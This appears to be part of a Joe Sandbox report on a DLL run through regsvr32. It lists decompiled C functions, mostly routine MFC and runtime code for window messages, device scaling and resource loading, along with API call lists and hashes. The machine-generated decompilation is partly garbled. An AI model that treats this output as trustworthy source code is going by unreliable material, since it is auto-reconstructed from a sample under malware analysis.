                                                                                                                				return E1004763E(0, _t43,  *(_t58 + 0x8c) ^ _t58, _t52, _t53, _t57);
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10035EB9
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 10035EC5
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 10035ED8
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 10035EDE
                                                                                                                • SendMessageA.USER32 ref: 10035F02
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AtomGlobal$Name$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1515195355-0
                                                                                                                • Opcode ID: 25b75d531d4a76369cd37772913bff965d773d12cf12d742e22f3eaf2c4a1cd6
                                                                                                                • Instruction ID: 5be1171fdf3591e7c986fb132ddb1d6712cc4fbab815219dffaaa8beb173d6a2
                                                                                                                • Opcode Fuzzy Hash: 25b75d531d4a76369cd37772913bff965d773d12cf12d742e22f3eaf2c4a1cd6
                                                                                                                • Instruction Fuzzy Hash: BD212F719005189EEB30DFB9CC45BEEB7F8FB08701F11451AE99AD7192E774A944CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1003E51C(void* __ecx, signed short _a4, signed short _a8, signed short _a12, signed short _a16) {
                                                                                                                				signed short _t24;
                                                                                                                				unsigned int _t34;
                                                                                                                				void* _t46;
                                                                                                                
                                                                                                                				_t46 = __ecx;
                                                                                                                				if(IsWindow( *(__ecx + 0x20)) == 0) {
                                                                                                                					 *(_t46 + 0xac) = _a4;
                                                                                                                					 *(_t46 + 0xb0) = _a8;
                                                                                                                					 *(_t46 + 0xa4) = _a12;
                                                                                                                					_t24 = _a16;
                                                                                                                					 *(_t46 + 0xa8) = _t24;
                                                                                                                					return _t24;
                                                                                                                				}
                                                                                                                				SendMessageA( *(_t46 + 0x20), 0x420, 0, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                                                                                                				SendMessageA( *(_t46 + 0x20), 0x41f, 0, (_a8 & 0x0000ffff) << 0x00000010 | _a4 & 0x0000ffff);
                                                                                                                				if( *0x100b9b10 >= 0x60000) {
                                                                                                                					_t34 = SendMessageA( *(_t46 + 0x20), 0x43a, 0, 0);
                                                                                                                					 *(_t46 + 0xac) = _t34 & 0x0000ffff;
                                                                                                                					 *(_t46 + 0xb0) = _t34 >> 0x10;
                                                                                                                				}
                                                                                                                				return InvalidateRect( *(_t46 + 0x20), 0, 1);
                                                                                                                			}







                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$InvalidateRectWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3225880595-0
                                                                                                                • Opcode ID: eba55d63198051db967d26b7d17f113c89d239f5d41592b7936e75cdc709e4af
                                                                                                                • Instruction ID: cc940a1e5372195ee0a3d138bca3cef25a0481447a39ca6b3c91d1d4f11775ec
                                                                                                                • Opcode Fuzzy Hash: eba55d63198051db967d26b7d17f113c89d239f5d41592b7936e75cdc709e4af
                                                                                                                • Instruction Fuzzy Hash: 93111CB1210718AFF7108F29CC80AB7B7E8FB44745F00492AF99AC6160E7B0AC50DB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1001FC86(intOrPtr* __ecx, int* _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _t12;
                                                                                                                				int _t14;
                                                                                                                				int _t22;
                                                                                                                				int _t32;
                                                                                                                				int* _t36;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t35 = __ecx;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					_t22 =  *0x100bdc90; // 0x60
                                                                                                                					_t12 =  *0x100bdc94; // 0x60
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t32 = GetMapMode( *(__ecx + 8));
                                                                                                                					if(_t32 >= 7 || _t32 == 1) {
                                                                                                                						_t22 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                                						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                                						L6:
                                                                                                                						_t36 = _a4;
                                                                                                                						_v8 = _t12;
                                                                                                                						 *_t36 = MulDiv( *_t36, 0x9ec, _t22);
                                                                                                                						_t14 = MulDiv(_t36[1], 0x9ec, _v8);
                                                                                                                						_t36[1] = _t14;
                                                                                                                					} else {
                                                                                                                						_push(3);
                                                                                                                						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                						E1000CB4B(__ecx, _a4);
                                                                                                                						_push(_t32);
                                                                                                                						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t14;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 1001FC96
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 1001FCD0
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1001FCD9
                                                                                                                  • Part of subcall function 1000CB4B: MulDiv.KERNEL32 ref: 1000CB8B
                                                                                                                  • Part of subcall function 1000CB4B: MulDiv.KERNEL32 ref: 1000CBA8
                                                                                                                • MulDiv.KERNEL32 ref: 1001FCFD
                                                                                                                • MulDiv.KERNEL32 ref: 1001FD08
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: c5bfe97383b21167ecbfd5733dc43ed74f11ef28515f61892ee91f832a9f131c
                                                                                                                • Instruction ID: 2dda1ed18a893bb91b8f729ca021f7bbaa3251bb817cbd0e8215410ef64a26ea
                                                                                                                • Opcode Fuzzy Hash: c5bfe97383b21167ecbfd5733dc43ed74f11ef28515f61892ee91f832a9f131c
                                                                                                                • Instruction Fuzzy Hash: 3B11C235600A14AFDB21AF55CD84C2EBBE9FF99750B11041AF9865B361CB71EC40DF80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 82%
                                                                                                                			E1001FD14(intOrPtr* __ecx, int* _a4) {
                                                                                                                				int _v8;
                                                                                                                				int _t12;
                                                                                                                				int _t14;
                                                                                                                				int _t30;
                                                                                                                				int _t33;
                                                                                                                				int* _t36;
                                                                                                                
                                                                                                                				_push(__ecx);
                                                                                                                				_t35 = __ecx;
                                                                                                                				if(__ecx == 0) {
                                                                                                                					_t30 =  *0x100bdc90; // 0x60
                                                                                                                					_t12 =  *0x100bdc94; // 0x60
                                                                                                                					goto L6;
                                                                                                                				} else {
                                                                                                                					_t33 = GetMapMode( *(__ecx + 8));
                                                                                                                					if(_t33 >= 7 || _t33 == 1) {
                                                                                                                						_t30 = GetDeviceCaps( *(_t35 + 8), 0x58);
                                                                                                                						_t12 = GetDeviceCaps( *(_t35 + 8), 0x5a);
                                                                                                                						L6:
                                                                                                                						_t36 = _a4;
                                                                                                                						_v8 = _t12;
                                                                                                                						 *_t36 = MulDiv( *_t36, _t30, 0x9ec);
                                                                                                                						_t14 = MulDiv(_t36[1], _v8, 0x9ec);
                                                                                                                						_t36[1] = _t14;
                                                                                                                					} else {
                                                                                                                						_push(3);
                                                                                                                						 *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                						E1000CAE2(__ecx, _a4);
                                                                                                                						_push(_t33);
                                                                                                                						_t14 =  *((intOrPtr*)( *__ecx + 0x34))();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				return _t14;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                • GetMapMode.GDI32(?), ref: 1001FD24
                                                                                                                • GetDeviceCaps.GDI32(?,00000058), ref: 1001FD5E
                                                                                                                • GetDeviceCaps.GDI32(?,0000005A), ref: 1001FD67
                                                                                                                  • Part of subcall function 1000CAE2: MulDiv.KERNEL32 ref: 1000CB22
                                                                                                                  • Part of subcall function 1000CAE2: MulDiv.KERNEL32 ref: 1000CB3F
                                                                                                                • MulDiv.KERNEL32 ref: 1001FD8B
                                                                                                                • MulDiv.KERNEL32 ref: 1001FD96
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice$Mode
                                                                                                                • String ID:
                                                                                                                • API String ID: 696222070-0
                                                                                                                • Opcode ID: a09eb238ece8f688eb0d6614b3b950c93c589ed83f5e5c5479ebd71d61082c37
                                                                                                                • Instruction ID: 1b1f7cd94bb43c6985f4debd3ae4dface2fa8dd3e1b3935f9df79c40de1ecee6
                                                                                                                • Opcode Fuzzy Hash: a09eb238ece8f688eb0d6614b3b950c93c589ed83f5e5c5479ebd71d61082c37
                                                                                                                • Instruction Fuzzy Hash: C011AC35600A14AFEB21AF65CC84C2EBBBAEF99754B114419F9869B360DB71EC41DB80
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 94%
                                                                                                                			E100219F5(void* __ecx, intOrPtr __edx, struct HWND__* _a4, CHAR* _a8) {
                                                                                                                				signed int _v8;
                                                                                                                				char _v263;
                                                                                                                				char _v264;
                                                                                                                				void* __ebx;
                                                                                                                				void* __edi;
                                                                                                                				void* __esi;
                                                                                                                				void* __ebp;
                                                                                                                				signed int _t9;
                                                                                                                				struct HWND__* _t21;
                                                                                                                				void* _t22;
                                                                                                                				intOrPtr _t25;
                                                                                                                				void* _t26;
                                                                                                                				int _t27;
                                                                                                                				CHAR* _t28;
                                                                                                                				signed int _t29;
                                                                                                                
                                                                                                                				_t25 = __edx;
                                                                                                                				_t22 = __ecx;
                                                                                                                				_t9 =  *0x100b9e70; // 0xbb35530
                                                                                                                				_v8 = _t9 ^ _t29;
                                                                                                                				_t21 = _a4;
                                                                                                                				_t32 = _t21;
                                                                                                                				_t28 = _a8;
                                                                                                                				if(_t21 == 0) {
                                                                                                                					L1:
                                                                                                                					E1000A069(_t21, _t22, _t26, _t28, _t32);
                                                                                                                				}
                                                                                                                				if(_t28 == 0) {
                                                                                                                					goto L1;
                                                                                                                				}
                                                                                                                				_t27 = lstrlenA(_t28);
                                                                                                                				_v264 = 0;
                                                                                                                				E10049170(_t27,  &_v263, 0, 0xff);
                                                                                                                				if(_t27 > 0x100 || GetWindowTextA(_t21,  &_v264, 0x100) != _t27 || lstrcmpA( &_v264, _t28) != 0) {
                                                                                                                					_t16 = SetWindowTextA(_t21, _t28);
                                                                                                                				}
                                                                                                                				return E1004763E(_t16, _t21, _v8 ^ _t29, _t25, _t27, _t28);
                                                                                                                			}



















                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(1001F17A,?,?,00000000), ref: 10021A1F
                                                                                                                • _memset.LIBCMT ref: 10021A3C
                                                                                                                • GetWindowTextA.USER32(?,00000000,00000100), ref: 10021A56
                                                                                                                • lstrcmpA.KERNEL32(00000000,1001F17A), ref: 10021A68
                                                                                                                • SetWindowTextA.USER32(?,1001F17A), ref: 10021A74
                                                                                                                  • Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
                                                                                                                  • Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow$Exception@8H_prolog3Throw_memsetlstrcmplstrlen
                                                                                                                • String ID:
                                                                                                                • API String ID: 4273134663-0
                                                                                                                • Opcode ID: f37ae391a2a477733342357afa6a883f85541bd245fc17c728e52e5f3896c037
                                                                                                                • Instruction ID: 499d7301ef98d5b65c02851671055dc1f9410084b471d0e54be72e61f8d27827
                                                                                                                • Opcode Fuzzy Hash: f37ae391a2a477733342357afa6a883f85541bd245fc17c728e52e5f3896c037
                                                                                                                • Instruction Fuzzy Hash: FA01D6796012186BEB00DF74DDC4BDF73ACEB15380F4100A1F946D3141DA749E8487A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 85%
                                                                                                                			E100354D7(void* __ecx) {
                                                                                                                				struct tagMSG _v28;
                                                                                                                				char _v52;
                                                                                                                				intOrPtr _v64;
                                                                                                                				void* __ebx;
                                                                                                                				int __edi;
                                                                                                                				void* __esi;
                                                                                                                				int __ebp;
                                                                                                                				void* _t13;
                                                                                                                				void* _t19;
                                                                                                                				void* _t21;
                                                                                                                				void* _t22;
                                                                                                                				intOrPtr _t23;
                                                                                                                				void* _t24;
                                                                                                                				void* _t26;
                                                                                                                
                                                                                                                				_t22 = __ecx;
                                                                                                                				_t26 = __ecx;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x68)) == 0) {
                                                                                                                					L11:
                                                                                                                					return _t13;
                                                                                                                				} else {
                                                                                                                					__edi = 0x367;
                                                                                                                					__eax =  &_v28;
                                                                                                                					__eax = PeekMessageA( &_v28,  *(__esi + 0x20), 0x367, 0x367, 3);
                                                                                                                					__ebx = PostMessageA;
                                                                                                                					if(__eax == 0) {
                                                                                                                						__eax = PostMessageA( *(__esi + 0x20), 0x367, 0, 0);
                                                                                                                					}
                                                                                                                					if(GetCapture() ==  *(__esi + 0x20)) {
                                                                                                                						__eax = ReleaseCapture();
                                                                                                                					}
                                                                                                                					__ecx = __esi;
                                                                                                                					__eax = E10014BA7(__esi);
                                                                                                                					if(__eax != __ebp) {
                                                                                                                						 *(__esi + 0x68) = __ebp;
                                                                                                                						 *(__eax + 0x68) = __ebp;
                                                                                                                						__eax = PostMessageA( *(__esi + 0x20), 0x36a, __ebp, __ebp);
                                                                                                                						goto L11;
                                                                                                                					} else {
                                                                                                                						_push(0);
                                                                                                                						_push(_t22);
                                                                                                                						_v52 = 0x100b8618;
                                                                                                                						L10048E48( &_v52, 0x100aff30);
                                                                                                                						asm("int3");
                                                                                                                						_push(4);
                                                                                                                						E1004764D(0x1008dd26, _t21, _t24, _t26);
                                                                                                                						_t23 = E10020454(0x104);
                                                                                                                						_v64 = _t23;
                                                                                                                						_t19 = 0;
                                                                                                                						_v52 = 0;
                                                                                                                						if(_t23 != 0) {
                                                                                                                							_t19 = E1001DB72(_t23);
                                                                                                                						}
                                                                                                                						return E10047725(_t19);
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}


















                                                                                                                APIs
                                                                                                                • PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 100354F8
                                                                                                                • PostMessageA.USER32(?,00000367,00000000,00000000), ref: 1003550E
                                                                                                                • GetCapture.USER32 ref: 10035510
                                                                                                                • ReleaseCapture.USER32 ref: 1003551B
                                                                                                                • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 10035541
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Message$CapturePost$PeekRelease
                                                                                                                • String ID:
                                                                                                                • API String ID: 1125932295-0
                                                                                                                • Opcode ID: 37a08277240ea16d8cdabf5d03996f0f311aa652a5b916b4b4eb8d78ede6edce
                                                                                                                • Instruction ID: a29667abefbe2db7b0d112607e15090e929c334846b5b58c1d4275725dc5be7d
                                                                                                                • Opcode Fuzzy Hash: 37a08277240ea16d8cdabf5d03996f0f311aa652a5b916b4b4eb8d78ede6edce
                                                                                                                • Instruction Fuzzy Hash: E701D631504A48AFE221AF22CC84E5B7FBDFB86786F51095DF08686131D632F950C7A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A6DA(void* __ecx, int _a4, int* _a8, intOrPtr* _a12) {
                                                                                                                				int _v8;
                                                                                                                				int _t12;
                                                                                                                				int _t13;
                                                                                                                				int _t15;
                                                                                                                				int* _t19;
                                                                                                                				struct HDC__* _t25;
                                                                                                                
                                                                                                                				_t25 = _a4;
                                                                                                                				if(_t25 == 0 || GetDeviceCaps(_t25, 0x58) == 0) {
                                                                                                                					_t12 =  *0x100bdc90; // 0x60
                                                                                                                					_a4 = _t12;
                                                                                                                					_t13 =  *0x100bdc94; // 0x60
                                                                                                                				} else {
                                                                                                                					_a4 = GetDeviceCaps(_t25, 0x58);
                                                                                                                					_t13 = GetDeviceCaps(_t25, 0x5a);
                                                                                                                				}
                                                                                                                				_t19 = _a8;
                                                                                                                				_v8 = _t13;
                                                                                                                				 *_a12 = MulDiv(_a4,  *_t19, 0x9ec);
                                                                                                                				_t15 = MulDiv(_v8, _t19[1], 0x9ec);
                                                                                                                				 *(_a12 + 4) = _t15;
                                                                                                                				return _t15;
                                                                                                                			}










                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice
                                                                                                                • String ID:
                                                                                                                • API String ID: 328075279-0
                                                                                                                • Opcode ID: 498338ea87492908b006cc8a3b6be909bbbc3913fbdaaa9e2241c104f56ad4ff
                                                                                                                • Instruction ID: 51676ef5807ffaf306a49f9bbb692178de7f26ca882ce8d59eb7c1b25d8ce487
                                                                                                                • Opcode Fuzzy Hash: 498338ea87492908b006cc8a3b6be909bbbc3913fbdaaa9e2241c104f56ad4ff
                                                                                                                • Instruction Fuzzy Hash: 59011235900218FFEB11DF55CD80D5A7FB9EB86790B14805AFD0897250D7B19D11DF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000A673(int _a4, int* _a8, intOrPtr* _a12) {
                                                                                                                				int _t9;
                                                                                                                				int _t11;
                                                                                                                				struct HDC__* _t14;
                                                                                                                				int* _t15;
                                                                                                                				int _t18;
                                                                                                                
                                                                                                                				_t14 = _a4;
                                                                                                                				if(_t14 == 0 || GetDeviceCaps(_t14, 0x58) == 0) {
                                                                                                                					_t18 =  *0x100bdc90; // 0x60
                                                                                                                					_t9 =  *0x100bdc94; // 0x60
                                                                                                                				} else {
                                                                                                                					_t18 = GetDeviceCaps(_t14, 0x58);
                                                                                                                					_t9 = GetDeviceCaps(_t14, 0x5a);
                                                                                                                				}
                                                                                                                				_t15 = _a8;
                                                                                                                				_a4 = _t9;
                                                                                                                				 *_a12 = MulDiv(0x9ec,  *_t15, _t18);
                                                                                                                				_t11 = MulDiv(0x9ec, _t15[1], _a4);
                                                                                                                				 *(_a12 + 4) = _t11;
                                                                                                                				return _t11;
                                                                                                                			}









                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsDevice
                                                                                                                • String ID:
                                                                                                                • API String ID: 328075279-0
                                                                                                                • Opcode ID: f6d52857f3f8d9bf59b635682ae3576837b394e7aa8c675bd496f2aa6d4a99f3
                                                                                                                • Instruction ID: 895715aa3ec41fd6efb3120891880696564a458cddba16438aa0474ee140ee27
                                                                                                                • Opcode Fuzzy Hash: f6d52857f3f8d9bf59b635682ae3576837b394e7aa8c675bd496f2aa6d4a99f3
                                                                                                                • Instruction Fuzzy Hash: D6014F75600318ABEB01DF65CCC4D5B7FADFB8A7A0B18402AFE0857251DA75D801DFA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 77%
                                                                                                                			E1002A40C(void* __ebx, void* __edi, void* __ebp, void* __eflags, CHAR* _a4) {
                                                                                                                				intOrPtr _v4;
                                                                                                                				void* __ecx;
                                                                                                                				void* __esi;
                                                                                                                				struct HRSRC__* _t6;
                                                                                                                				void* _t8;
                                                                                                                				struct HRSRC__* _t10;
                                                                                                                				struct HRSRC__* _t14;
                                                                                                                				intOrPtr _t16;
                                                                                                                				void* _t19;
                                                                                                                				void* _t21;
                                                                                                                				struct HINSTANCE__* _t22;
                                                                                                                
                                                                                                                				_v4 = _t16;
                                                                                                                				_t22 =  *(E1001E302(__ebx, __edi, _t21, __eflags) + 0xc);
                                                                                                                				if(_t22 != 0) {
                                                                                                                					_push(__ebx);
                                                                                                                					_t6 = FindResourceA(_t22, _a4, 5);
                                                                                                                					_t14 = _t6;
                                                                                                                					__eflags = _t14;
                                                                                                                					if(_t14 != 0) {
                                                                                                                						_push(__ebp);
                                                                                                                						_push(__edi);
                                                                                                                						_t19 = LoadResource(_t22, _t14);
                                                                                                                						_t8 = LockResource(_t19);
                                                                                                                						_t10 = E1002A3AE(_v4, _t8, _t8, SizeofResource(_t22, _t14));
                                                                                                                						FreeResource(_t19);
                                                                                                                						_t6 = _t10;
                                                                                                                					}
                                                                                                                					return _t6;
                                                                                                                				}
                                                                                                                				return 0;
                                                                                                                			}















                                                                                                                APIs
                                                                                                                • FindResourceA.KERNEL32 ref: 1002A42A
                                                                                                                • LoadResource.KERNEL32(?,00000000), ref: 1002A43A
                                                                                                                • LockResource.KERNEL32(00000000), ref: 1002A443
                                                                                                                • SizeofResource.KERNEL32(?,00000000), ref: 1002A44D
                                                                                                                • FreeResource.KERNEL32(00000000,00000000,00000000), ref: 1002A461
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Resource$FindFreeLoadLockSizeof
                                                                                                                • String ID:
                                                                                                                • API String ID: 4159136517-0
                                                                                                                • Opcode ID: 95b9d2a4c0596dbc68a7913f468048979d06e9f9ffaf4b11731570b30cf6fdbc
                                                                                                                • Instruction ID: f4c258c3e0f3460aec006f9b603e92ef3604b289b1ebd12ab008e46807a9b7ea
                                                                                                                • Opcode Fuzzy Hash: 95b9d2a4c0596dbc68a7913f468048979d06e9f9ffaf4b11731570b30cf6fdbc
                                                                                                                • Instruction Fuzzy Hash: A8F096766017246FE300AB749D8CDAFB7ECEF876917054469FE01D3211DA75DC0087A0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 27%
                                                                                                                			E1004C8CE(void* __ebx, intOrPtr __edx, void* __edi, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                                                                                                				intOrPtr* _v0;
                                                                                                                				DWORD* _v8;
                                                                                                                				void* _v20;
                                                                                                                				void* _v24;
                                                                                                                				intOrPtr _v28;
                                                                                                                				void* __esi;
                                                                                                                				void* _t30;
                                                                                                                				void* _t36;
                                                                                                                				DWORD* _t41;
                                                                                                                				intOrPtr* _t43;
                                                                                                                				void* _t45;
                                                                                                                				void* _t51;
                                                                                                                				intOrPtr* _t54;
                                                                                                                				void* _t64;
                                                                                                                				intOrPtr _t65;
                                                                                                                				intOrPtr* _t67;
                                                                                                                				void* _t68;
                                                                                                                
                                                                                                                				_t64 = __edi;
                                                                                                                				_t61 = __edx;
                                                                                                                				_t51 = __ebx;
                                                                                                                				E1004C648(_v28);
                                                                                                                				asm("int3");
                                                                                                                				_push(_t67);
                                                                                                                				E10051513();
                                                                                                                				_t30 = E100514F8(E1005150D());
                                                                                                                				if(_t30 != 0) {
                                                                                                                					_t54 = _v0;
                                                                                                                					 *((intOrPtr*)(_t30 + 0x54)) =  *((intOrPtr*)(_t54 + 0x54));
                                                                                                                					 *((intOrPtr*)(_t30 + 0x58)) =  *((intOrPtr*)(_t54 + 0x58));
                                                                                                                					_t61 =  *((intOrPtr*)(_t54 + 4));
                                                                                                                					_push(_t54);
                                                                                                                					 *((intOrPtr*)(_t30 + 4)) =  *((intOrPtr*)(_t54 + 4));
                                                                                                                					E100516E2(__ebx, __edi, _t67, __eflags);
                                                                                                                				} else {
                                                                                                                					_t67 = _v0;
                                                                                                                					if(E1005153D(E1005150D(), _t67) == 0) {
                                                                                                                						ExitThread(GetLastError());
                                                                                                                					}
                                                                                                                					 *_t67 = GetCurrentThreadId();
                                                                                                                				}
                                                                                                                				_t78 =  *0x100a0c58;
                                                                                                                				if( *0x100a0c58 != 0) {
                                                                                                                					_t45 = E10054892(_t51, _t64, _t67, _t78);
                                                                                                                					_t79 = _t45;
                                                                                                                					_t54 = 0x100a0c58;
                                                                                                                					if(_t45 != 0) {
                                                                                                                						 *0x100a0c58();
                                                                                                                					}
                                                                                                                				}
                                                                                                                				E1004C899(_t61, _t64, _t67, _t79);
                                                                                                                				asm("int3");
                                                                                                                				_push(_t54);
                                                                                                                				_push(_t51);
                                                                                                                				_push(_t64);
                                                                                                                				_t65 = _v0;
                                                                                                                				_t80 = _t65;
                                                                                                                				_v20 = 0;
                                                                                                                				if(_t65 != 0) {
                                                                                                                					_push(_t67);
                                                                                                                					E10051513();
                                                                                                                					_t68 = E1005496F(1, 0x214);
                                                                                                                					__eflags = _t68;
                                                                                                                					if(__eflags == 0) {
                                                                                                                						L16:
                                                                                                                						_push(_t68);
                                                                                                                						E100470E9(0, _t65, _t68, __eflags);
                                                                                                                						__eflags = _v8;
                                                                                                                						if(_v8 != 0) {
                                                                                                                							E100490BD(_v8);
                                                                                                                						}
                                                                                                                						_t36 = 0;
                                                                                                                						__eflags = 0;
                                                                                                                					} else {
                                                                                                                						_push( *((intOrPtr*)(E100516CA(_t61, _t65, __eflags) + 0x6c)));
                                                                                                                						_push(_t68);
                                                                                                                						E10051593(0, _t65, _t68, __eflags);
                                                                                                                						 *(_t68 + 4) =  *(_t68 + 4) | 0xffffffff;
                                                                                                                						 *((intOrPtr*)(_t68 + 0x58)) = _a16;
                                                                                                                						_t41 = _a24;
                                                                                                                						__eflags = _t41;
                                                                                                                						 *((intOrPtr*)(_t68 + 0x54)) = _t65;
                                                                                                                						if(_t41 == 0) {
                                                                                                                							_t41 =  &_a12;
                                                                                                                						}
                                                                                                                						_t36 = CreateThread(_a4, _a8, "V�3L", _t68, _a20, _t41);
                                                                                                                						__eflags = _t36;
                                                                                                                						if(__eflags == 0) {
                                                                                                                							_v8 = GetLastError();
                                                                                                                							goto L16;
                                                                                                                						}
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					_t43 = E10049097(_t80);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					_push(0);
                                                                                                                					 *_t43 = 0x16;
                                                                                                                					E10050228(0, _t61, _t65);
                                                                                                                					_t36 = 0;
                                                                                                                				}
                                                                                                                				return _t36;
                                                                                                                			}





















                                                                                                                APIs
                                                                                                                  • Part of subcall function 1004C648: _doexit.LIBCMT ref: 1004C650
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 1004C8DB
                                                                                                                  • Part of subcall function 10051513: TlsGetValue.KERNEL32 ref: 10051519
                                                                                                                  • Part of subcall function 10051513: __decode_pointer.LIBCMT ref: 10051529
                                                                                                                  • Part of subcall function 10051513: TlsSetValue.KERNEL32(00000000,1005493C,?,00000001,00000001,1004ECAF,00000018,100B5BF0,0000000C,1004ED3E,00000001,00000001,?,10051765,0000000D,100B5E08), ref: 10051536
